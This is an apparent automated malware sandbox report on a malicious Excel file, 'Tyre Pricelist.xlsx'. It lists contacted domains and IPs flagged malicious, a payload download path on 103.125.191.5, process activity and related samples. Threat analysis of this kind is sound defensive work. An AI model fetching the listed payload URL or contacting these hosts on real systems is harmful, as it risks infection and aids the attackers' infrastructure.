          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%Avira URL Cloudsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.atlanticdentallab.com
          		180.215.92.80
          		truetrueunknown
          www.pestigenix.com
          		91.195.241.137
          		truetrue
            		unknown
            workfinethdysanotherrainbowlomoyentthghf.ydns.eu
            		103.125.191.5
            		truetrueunknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://search.chol.com/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
              		high
              http://www.mercadolivre.com.br/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              http://search.ebay.de/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                		high
                http://www.mtv.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                  		high
                  http://www.rambler.ru/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                    		high
                    http://www.nifty.com/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                      		high
                      http://www.dailymail.co.uk/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www3.fnac.com/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                        		high
                        http://buscar.ya.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                          		high
                          http://search.yahoo.com/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                            		high
                            http://www.iis.fhg.de/audioPAexplorer.exe, 00000008.00000000.2196291605.0000000004B50000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.sogou.com/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                              		high
                              http://asp.usatoday.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                		high
                                http://fr.search.yahoo.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                  		high
                                  http://rover.ebay.comexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                    		high
                                    http://in.search.yahoo.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                      		high
                                      http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                        		high
                                        http://search.ebay.in/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                          		high
                                          http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://msk.afisha.ru/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                            		high
                                            http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://search.rediff.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                              		high
                                              http://www.ya.com/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                		high
                                                http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://it.search.dada.net/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://search.naver.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  		high
                                                  http://www.google.ru/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    		high
                                                    http://search.hanafos.com/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    • 0%, Virustotal, Browse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.abril.com.br/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://search.daum.net/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      		high
                                                      http://search.naver.com/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        		high
                                                        http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.clarin.com/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          		high
                                                          http://buscar.ozu.es/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://kr.search.yahoo.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            		high
                                                            http://search.about.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              		high
                                                              http://busca.igbusca.com.br/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                		high
                                                                http://www.ask.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.priceminister.com/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.cjmall.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      		high
                                                                      http://search.centrum.cz/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        		high
                                                                        http://suche.t-online.de/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.google.it/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            		high
                                                                            http://search.auction.co.kr/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.ceneo.pl/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              		high
                                                                              http://www.amazon.de/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                		high
                                                                                http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000008.00000000.2195836515.00000000041AD000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://sads.myspace.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://google.pchome.com.tw/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://www.rambler.ru/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://uk.search.yahoo.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://espanol.search.yahoo.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://www.ozu.es/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://search.sify.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://openimage.interpark.com/interpark.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://search.ebay.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.gmarket.co.kr/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  http://search.nifty.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://searchresults.news.com.au/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    http://www.google.si/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.google.cz/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.soso.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.univision.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://search.ebay.it/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.asharqalawsat.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://busca.orange.es/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://search.yahoo.co.jpexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://www.target.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://buscador.terra.es/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://search.orange.co.uk/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://www.iask.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://www.tesco.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://cgi.search.biglobe.ne.jp/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://search.seznam.cz/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://suche.freenet.de/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://search.interpark.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://search.espn.go.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://www.myspace.com/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://search.centrum.cz/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://p.zhongsou.com/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    http://service2.bfast.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    http://www.%s.comPAvbc.exe, 00000004.00000002.2195649466.00000000064A0000.00000002.00000001.sdmp, RegAsm.exe, 00000006.00000002.2219630675.0000000002120000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2189359116.0000000001C70000.00000002.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		low
                                                                                                                                    http://ariadna.elmundo.es/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://www.news.com.au/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      http://www.cdiscount.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://www.tiscali.it/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://it.search.yahoo.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://www.ceneo.pl/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://www.servicios.clarin.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                		high

                                                                                                                                                Contacted IPs

                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                Public

                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                91.195.241.137
                                                                                                                                                		unknownGermany
                                                                                                                                                		47846SEDO-ASDEtrue
                                                                                                                                                103.125.191.5
                                                                                                                                                		unknownViet Nam
                                                                                                                                                		135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue
                                                                                                                                                180.215.92.80
                                                                                                                                                		unknownSingapore
                                                                                                                                                		64050BCPL-SGBGPNETGlobalASNSGtrue

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                Analysis ID:321115
                                                                                                                                                Start date:20.11.2020
                                                                                                                                                Start time:11:22:16
                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 9m 54s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:light
                                                                                                                                                Sample file name:Tyre Pricelist.xlsx
                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                Number of analysed new started processes analysed:13
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:1
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • HDC enabled
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal100.troj.expl.evad.winXLSX@15/3@3/3
                                                                                                                                                EGA Information:Failed
                                                                                                                                                HDC Information:
                                                                                                                                                • Successful, ratio: 21.3% (good quality ratio 20.1%)
                                                                                                                                                • Quality average: 70.9%
                                                                                                                                                • Quality standard deviation: 28.9%
                                                                                                                                                HCA Information:
                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                • Number of executed functions: 0
                                                                                                                                                • Number of non-executed functions: 0
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Adjust boot time
                                                                                                                                                • Enable AMSI
                                                                                                                                                • Found application associated with file extension: .xlsx
                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                • Attach to Office via COM
                                                                                                                                                • Scroll down
                                                                                                                                                • Close Viewer
                                                                                                                                                Warnings:
                                                                                                                                                Show All
                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                                                                                                                • TCP Packets have been reduced to 100
                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                TimeTypeDescription
                                                                                                                                                11:23:16API Interceptor97x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                11:23:20API Interceptor55x Sleep call for process: vbc.exe modified
                                                                                                                                                11:23:26API Interceptor32x Sleep call for process: RegAsm.exe modified
                                                                                                                                                11:23:43API Interceptor230x Sleep call for process: NETSTAT.EXE modified

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                103.125.191.52eD17GZuWs.exeGet hashmaliciousBrowse
                                                                                                                                                • 103.125.191.5/bin_xMjelaYnr43.bin
                                                                                                                                                Unique food order.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.125.191.5/bin_xMjelaYnr43.bin

                                                                                                                                                Domains

                                                                                                                                                No context

                                                                                                                                                ASN

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                SEDO-ASDEnew file.exe.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.195.241.136
                                                                                                                                                Bonifico n.1101202910070714.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.195.241.136
                                                                                                                                                hRVrTsMv25.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.195.241.136
                                                                                                                                                v6k2UHU2xk.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.195.241.136
                                                                                                                                                http://walmartmoneycard.xyzGet hashmaliciousBrowse
                                                                                                                                                • 91.195.240.136
                                                                                                                                                http://ww1.0ffice.com/Get hashmaliciousBrowse
                                                                                                                                                • 91.195.240.14
                                                                                                                                                New Additional Agreement.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.195.240.94
                                                                                                                                                UBEH7JEUC0.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.195.241.136
                                                                                                                                                Additional Agreement 2020-KYC.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.195.240.94
                                                                                                                                                H4A2-423-EM152-010.TIF.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.195.240.13
                                                                                                                                                Additional Agreement 2020-KYC.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.195.240.94
                                                                                                                                                ORDER7098EAR.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.195.241.136
                                                                                                                                                mFNIsJZPe2.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.195.240.94
                                                                                                                                                http://walmartmoneycard.xyzGet hashmaliciousBrowse
                                                                                                                                                • 91.195.240.136
                                                                                                                                                Additional Agreement 2020-KYC.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.195.240.94
                                                                                                                                                AWB# 9284730932.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.195.240.94
                                                                                                                                                DEWA PROJECT 12100317.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.195.240.94
                                                                                                                                                http://tgreendot.comGet hashmaliciousBrowse
                                                                                                                                                • 91.195.240.136
                                                                                                                                                http://freeaccountnow.comGet hashmaliciousBrowse
                                                                                                                                                • 91.195.240.136
                                                                                                                                                http://krypton.rackage.co.ukGet hashmaliciousBrowse
                                                                                                                                                • 91.195.240.87
                                                                                                                                                VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN2eD17GZuWs.exeGet hashmaliciousBrowse
                                                                                                                                                • 103.125.191.5
                                                                                                                                                Unique food order.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.125.191.5
                                                                                                                                                tt payment proof.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.125.191.187
                                                                                                                                                TIE-3735-2020.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.125.191.229
                                                                                                                                                payslip.s.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.125.191.187
                                                                                                                                                Telex-relase.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.141.138.120
                                                                                                                                                Y0L60XAhvo.rtfGet hashmaliciousBrowse
                                                                                                                                                • 103.141.138.122
                                                                                                                                                d6pj421rXA.exeGet hashmaliciousBrowse
                                                                                                                                                • 103.139.45.59
                                                                                                                                                8YPssSkVtu.rtfGet hashmaliciousBrowse
                                                                                                                                                • 103.141.138.87
                                                                                                                                                PI098763556299.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.125.191.229
                                                                                                                                                PIT12425009.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.125.191.229
                                                                                                                                                wIeFid8p7Q.exeGet hashmaliciousBrowse
                                                                                                                                                • 103.125.189.164
                                                                                                                                                Dell ordine-09362-9-11-2020.exeGet hashmaliciousBrowse
                                                                                                                                                • 103.139.45.59
                                                                                                                                                shipping documents.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.133.108.6
                                                                                                                                                shipping documents.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.133.108.6
                                                                                                                                                EES RFQ 60-19__pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 103.114.107.156
